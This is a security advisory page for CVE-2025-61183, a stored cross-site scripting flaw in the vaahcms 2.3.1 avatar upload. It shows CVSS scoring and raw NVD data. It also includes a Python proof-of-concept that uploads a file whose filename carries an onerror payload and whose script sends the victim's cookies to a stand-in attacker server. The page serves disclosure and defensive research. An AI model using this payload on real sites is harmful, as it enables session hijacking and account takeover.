Security Vulnerability Report
中文
CVE-2025-61183 CVSS 6.1 MEDIUM

CVE-2025-61183

Published: 2025-10-08 14:15:46
Last Modified: 2025-10-09 16:09:37
Source: [email protected]

Description

Cross Site Scripting in vaahcms v.2.3.1 allows a remote attacker to execute arbitrary code via upload method in the storeAvatar() method of UserBase.php

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:webreinvent:vaahcms:2.3.1:*:*:*:*:*:*:* - VULNERABLE
vaahcms < 2.3.2
vaahcms 2.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61183 PoC - vaahcms v2.3.1 Stored XSS via storeAvatar() # Exploit: Upload a malicious file as avatar to execute arbitrary JavaScript import requests TARGET_URL = "http://target-vaahcms-site.com" UPLOAD_ENDPOINT = "/api/vaah/users/avatar" # storeAvatar() method endpoint # Step 1: Create a malicious payload file # The malicious file contains XSS payload that will execute when the avatar is rendered malicious_filename = 'avatar<img src=x onerror=alert(document.cookie)>.jpg' # JavaScript payload to steal cookies or perform actions xss_payload = ''' <script> // Steal session cookies var img = new Image(); img.src = "http://attacker-server.com/steal?cookie=" + document.cookie; // Or perform actions on behalf of the victim fetch('/api/admin/users', {credentials: 'include'}); </script> ''' # Step 2: Upload the malicious avatar headers = { "User-Agent": "Mozilla/5.0", "Accept": "application/json" } files = { "avatar": (malicious_filename, xss_payload, "image/jpeg") } # Step 3: Send the upload request response = requests.post( TARGET_URL + UPLOAD_ENDPOINT, files=files, headers=headers ) print(f"Upload Status: {response.status_code}") print(f"Response: {response.text}") # Step 4: When any user views the profile with this avatar, # the XSS payload will execute in their browser context print("Payload uploaded successfully. XSS will trigger when avatar is viewed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61183", "sourceIdentifier": "[email protected]", "published": "2025-10-08T14:15:46.220", "lastModified": "2025-10-09T16:09:36.593", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Scripting in vaahcms v.2.3.1 allows a remote attacker to execute arbitrary code via upload method in the storeAvatar() method of UserBase.php"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webreinvent:vaahcms:2.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "17C9E786-7169-428C-970D-BAD11F779AAB"}]}]}], "references": [{"url": "https://github.com/thawphone/CVE-2025-61183", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/webreinvent/vaahcms/issues/301", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.